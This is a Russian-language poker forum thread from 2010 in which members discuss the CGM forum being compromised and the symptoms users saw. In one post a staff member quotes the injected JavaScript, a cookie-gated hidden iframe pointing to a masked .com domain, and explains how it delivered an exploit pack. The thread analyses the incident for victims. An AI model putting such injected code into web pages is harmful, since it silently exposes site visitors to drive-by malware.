Регистрация
Регистрация Поиск Сообщество  
CGM > Всякая всячина > Техническая поддержка форума > О жизни форума
Опции темы

Опять хакнули форум ЦГМ.

Важные объявления
Старый 12.09.2010, 23:04     TS Старый   #1 (permalink)
Увлечённый
 
Аватар для maasea
 
Регистрация: 08.06.2009
Адрес: Петербург
Сообщений: 568
собственно, любой может убедиться разлогинившись.
подгружается стандартный для vbulletin скрипт clientscript/vbulletin_md5.js в который кто-то ловко вставил ифрейм со ссылкой на левый домен в зоне .com - можете посмотреть исходник сами.
возможно, левый код вставили и в другие скрипты, не проверял.
maasea вне форума      
Старый 12.09.2010, 23:09   #2 (permalink)
Увлечённый
 
Аватар для HeatherAle
 
Регистрация: 26.01.2007
Адрес: 1
Сообщений: 682
скинь скриншот
я пытался найти через гугл хром свой- не смог.
__________________
God plays against Chuck norris;
God goes all in and Chuck says raise!
HeatherAle вне форума      
Старый 12.09.2010, 23:15     TS Старый   #3 (permalink)
Увлечённый
 
Аватар для maasea
 
Регистрация: 08.06.2009
Адрес: Петербург
Сообщений: 568
выделенный фрагмент.

maasea вне форума      
Старый 12.09.2010, 23:31   #4 (permalink)
Старожил
 
Аватар для jiamo
 
Регистрация: 12.12.2008
Адрес: Москва
Сообщений: 1,128
Отправить сообщение для jiamo с помощью Skype™
Чем чревато?
__________________
Не играю на partypoker, bwin и фонбет .
jiamo вне форума      
Старый 12.09.2010, 23:35     TS Старый   #5 (permalink)
Увлечённый
 
Аватар для maasea
 
Регистрация: 08.06.2009
Адрес: Петербург
Сообщений: 568
на макскацоффе тоже кстати такой же ифрейм запихнули.

чревато тем, что ифрейм подгружает пак эксплойтов скорее всего. конечно не факт, что они расчитаны именно на твою версию браузера, тут уж как повезет.
maasea вне форума      
Старый 13.09.2010, 13:32   #6 (permalink)
Старожил
 
Регистрация: 08.04.2009
Сообщений: 1,174
Золотой кубок 
как защитится от этого?
__________________
Make Poker Great Again
School47 вне форума      
Старый 13.09.2010, 17:33   #7 (permalink)
Увлечённый
 
Аватар для futualien
 
Регистрация: 14.11.2009
Адрес: cgm.ru
Сообщений: 459
Отправить сообщение для futualien с помощью Skype™
Не сказал бы что прямо "хакнули", просто это была "бомба" - когда устанавливали форум, была такая строчка кода в скрипте и если вы понимаете в программировании, то увидите, что срабатывает она только при определенных условиях.
__________________
ВНИМАНИЕ!!! Ерунда в подписи.
Когда я ем - я глух и нем, хитер и быстр, и дъявольски умён!
futualien вне форума   +2 (+2/-0)    
Старый 13.09.2010, 17:56   #8 (permalink)
Старожил
 
Аватар для Skill
 
Регистрация: 14.02.2009
Адрес: .by
Сообщений: 858
Что за бомба, кто мог заминировать и при каких условиях сработает?
__________________
"I'm a player. I always will be. I can not be anyone else..."
Skill вне форума   +6 (+7/-1)    
Старый 17.09.2010, 11:00   #9 (permalink)
Увлечённый
 
Аватар для futualien
 
Регистрация: 14.11.2009
Адрес: cgm.ru
Сообщений: 459
Отправить сообщение для futualien с помощью Skype™
Цитата:
Сообщение от Skill Посмотреть сообщение
Что за бомба, кто мог заминировать и при каких условиях сработает?
"Бомба" срабатывала, если вы удовлетворяли некоторым условиям, заданным злоумышленником. Их суть не так важна, но вот результат вполне впечатляет: не все пользователи "подрывались", поэтому так долго и пролежала. Кто-то даже и не замечал, а кто-то замечал, но молчал.

Сработать уже она не сможет, т.к. была удалена =) А заминировать мог кто-угодно, если скрипты форума были скачаны () не с официального ресурса. Но даже и на официальном ресурсе производителей форума мог быть "злой дядька", который такую эффективную штуку и сделал, например перед увольнением или для получения выгоды.
__________________
ВНИМАНИЕ!!! Ерунда в подписи.
Когда я ем - я глух и нем, хитер и быстр, и дъявольски умён!
futualien вне форума   +1 (+1/-0)    
Старый 17.09.2010, 11:20   #10 (permalink)
('''/(-.-)/''')
 
Аватар для Lure
 
Регистрация: 09.07.2007
Адрес: Москва
Сообщений: 2,942
Конкретнее, кто пострадал? А то я может напоролся и не знаю.
__________________
The problem with wanting something is the fear of losing it, or never getting it.
Lure вне форума   +3 (+3/-0)    
Старый 17.09.2010, 16:28   #11 (permalink)
Бессмертный
 
Аватар для MaxBNuts
 
Регистрация: 02.09.2008
Адрес: Екатеринбург
Сообщений: 10,799
Серебряный кубок Бронзовый кубок 
Отправить сообщение для MaxBNuts с помощью ICQ
Цитата:
Сообщение от Lure Посмотреть сообщение
Конкретнее, кто пострадал? А то я может напоролся и не знаю.
Поддерживаю любопытность, а то "бомбы" , "подрывы", "злые дядьки" ) Лучше горькая правда, чем "вода".
MaxBNuts вне форума   +1 (+1/-0)    
Старый 17.09.2010, 19:18   #12 (permalink)
Бессмертный
 
Регистрация: 03.04.2006
Адрес: Санкт-Петербург
Сообщений: 6,622
Бронзовый кубок 
Отправить сообщение для stein с помощью ICQ
И условия какие были интересно бы узнать - может кто-то из форумчан удовлетворял им и не знает до сих пор
stein вне форума   +1 (+1/-0)    
Старый 17.09.2010, 22:46   #13 (permalink)
Ветеран
 
Регистрация: 06.03.2008
Адрес: москва
Сообщений: 1,350
че за расклад, какая бомба?? Я думаю надо написать конкретно, а не отписываться.
__________________
Мы - русские, мы все можем! Александр Суворов.
zigretc вне форума      
Старый 18.09.2010, 12:49   #14 (permalink)
Увлечённый
 
Аватар для futualien
 
Регистрация: 14.11.2009
Адрес: cgm.ru
Сообщений: 459
Отправить сообщение для futualien с помощью Skype™
Был такой код в скрипте:
[spoiler="вредный код"]
if (document.cookie.search("vb=555") == -1) {document.write("<if" + "rame src=http://ххх" + "хххх.com/fl/show.php style=display:none></ifra" + "me>"); document.cookie = "vb=555; expires=Sun, 10-Jan-2012 01:00:00 GMT;path=/";}
[/spoiler]
Логика кода:
1) проверяем, установлен ли кукис vb=555
2) если нет, то вписываем в окно фрейм и устанавливаем этот кукис до 10 января 2012 года
3) если кукис установлен, то ничего не делаем

Результат: исполнения
При первом заходе на форум неавторизованным вам вшивается этот фрейм и вы сами того не ведая загружаете страничку хакера, где выполняется Java-апплет (если установлена Java-машина), который запускает посещение другой страницы, содержащей javascript-код, приложением (например у меня вылез запрос на открытие файла, Opera 10.62). Во все последующие посещения форума скрипт вас затрагивать не будет, пока вы не очистите кукисы или не наступит 10 января 2012г., когда скрипт отработает вновь.

Отмечу, что:
1) Java-машина мало у кого установлена и фрейм откроется пустым
2) Скрипт ориентирован на какое-то конкретное приложение
3) файл имел давность начала 2009 года, соответственно можно предположить, что уязвимость какая-то старая и уже давно пофиксена обновлением уязвимой программы
4) не забывайте проверять компьютер на вирусы хотя бы раз в 1 неделю
__________________
ВНИМАНИЕ!!! Ерунда в подписи.
Когда я ем - я глух и нем, хитер и быстр, и дъявольски умён!
futualien вне форума      
Старый 20.09.2010, 05:35   #15 (permalink)
Бессмертный
 
Аватар для MaxBNuts
 
Регистрация: 02.09.2008
Адрес: Екатеринбург
Сообщений: 10,799
Серебряный кубок Бронзовый кубок 
Отправить сообщение для MaxBNuts с помощью ICQ
Не знаю что это, но очень неприятно!
В трее появляется значок явы, а потом вылетает такая ошибка! При заходе на любую страницу CGM, началось минут 40 назад.
Объясните что это, чем опасно и как лечится..
Изображения
 
MaxBNuts вне форума      
Старый 20.09.2010, 09:32   #16 (permalink)
Увлечённый
 
Аватар для Dr.Dorsanval
 
Регистрация: 19.02.2010
Адрес: Рашн
Сообщений: 605
Цитата:
Сообщение от MaxBNuts Посмотреть сообщение
Не знаю что это, но очень неприятно!
В трее появляется значок явы, а потом вылетает такая ошибка! При заходе на любую страницу CGM, началось минут 40 назад.
Объясните что это, чем опасно и как лечится..
а у меня в течении часа открывался медиа плеер, и выкидывало на главную страницу, только при входе на цгм и при попытке зайти в какой-нибудь раздел, при этом каспер сильно ругался=(( хз что такое, сейчас зашел все норм.
Dr.Dorsanval вне форума      
Старый 20.09.2010, 10:05     TS Старый   #17 (permalink)
Увлечённый
 
Аватар для maasea
 
Регистрация: 08.06.2009
Адрес: Петербург
Сообщений: 568
через ифрейм грузился пак эксплойтов, который использует известные уязвимости браузеров/адоб ридера/вм плеера/явы/чего там еще придумают для загрузки к вам на компьютер связки вирусов.

то, что у вас при открытии сайта с таким ифреймом вылезает медиа плеер или адоб ридер (или любая другая программа) с ошибкой и ругается антивирус, говорит о том, что ваш браузер небезопасен и не стоит ставить эксперименты над сохранностью своих счетов в румах заходя с его помощью на ЦГМ, где за неделю уже 2 раза вставили один и тот же ифрейм (за год это уже минимум третий случай).
maasea вне форума      
Старый 20.09.2010, 10:48   #18 (permalink)
SHIP IT
 
Аватар для pyjka
 
Регистрация: 08.10.2009
Адрес: Value City
Сообщений: 5,270
вот что мне выдает фаерфокс

тоже самое и гугл хром выдает
__________________
дневник
SHIP IT >><
pyjka вне форума   +1 (+1/-0)    
Старый 20.09.2010, 11:04   #19 (permalink)
Новороссия
 
Аватар для HighLamas
 
Регистрация: 03.01.2008
Адрес: Донецк
Сообщений: 8,364
Бронзовый кубок 
Отправить сообщение для HighLamas с помощью ICQ Отправить сообщение для HighLamas с помощью Skype™
у меня тоже самое
__________________
Новороссия
HighLamas вне форума      
Старый 20.09.2010, 11:43   #20 (permalink)
KING'S BLEND
 
Аватар для WhiteTrash
 
Регистрация: 27.08.2008
Адрес: Москва
Сообщений: 3,136
Бронзовой призер 
+1
Что это за фигня? Я отключил пока это предупреждение.
__________________
"Мы никогда не проигрываем, нам иногда не хватает времени!" (С) Sir Alexander Chapman Ferguson
WhiteTrash вне форума      

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ЦГМ хакнули или глюк? DmitryLove Техническая поддержка форума 83 13.03.2010 21:52
Ну и меня хакнули :( Jackdaw Ввод-вывод денег 33 01.07.2008 16:55
Хакнули webmoney. Срочно нужен совет iva8888 Ввод-вывод денег 4 12.06.2008 20:28
Опять тузы и опять не знаю как играть, Nl25 5max mordovorot Безлимитный холдем микро бай-инов 30 03.03.2008 15:42



Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Выкл.
Pingbacks are Выкл.
Refbacks are Выкл.

Быстрый переход
Правила форумов CGM Контакты Справка Обратная связь CGM.ru Архив Вверх Главная
 
Использование материалов сайта разрешено только при наличии активной ссылки на источник.
Все права на картинки и тексты принадлежат Информационному агентству CGM и их ПАРТНЕРАМ. Политика конфидециальности
CGM.ru на Youtube CGM.ru на Google+ CGM.ru в Twitter CGM.ru на Facebook CGM.ru в vKontakte CGM.ru в Instagram

В сотрудничестве с Pokeroff.ru
Текущее время: 11:05. Часовой пояс GMT +3.
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2022, vBulletin Solutions, Inc. Перевод: zCarot